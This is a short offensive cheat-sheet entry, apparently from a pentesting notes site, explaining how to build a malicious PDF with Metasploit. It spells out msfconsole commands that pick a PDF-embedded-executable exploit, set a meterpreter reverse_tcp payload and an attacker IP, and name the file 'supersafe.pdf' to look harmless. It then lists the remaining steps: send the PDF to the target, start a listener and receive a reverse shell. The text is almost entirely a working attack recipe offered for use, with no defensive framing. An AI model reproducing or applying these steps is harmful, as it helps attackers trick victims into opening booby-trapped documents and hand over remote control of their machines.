Malicious PDF
Exploitation using Metasploit
1. Create a PDF
msfconsole
msf> use exploit/windows/fileformat/adobe_pdf_embedded_exe
# Set payload for windows if target machine is windows
msf> set payload windows/x64/meterpreter/reverse_tcp
# Set the attacker's ip address
msf> set lhost 10.0.0.1
# Change filename
msf> set filename supersafe.pdf
# Optionally, the custom PDF can be used
msf> set infilename /path/to/custom.pdf
msf> exploit2. Send PDF to Target Machine
3. Start Listener in Attacker’s Machine
4. Reverse Shell
References
Last updated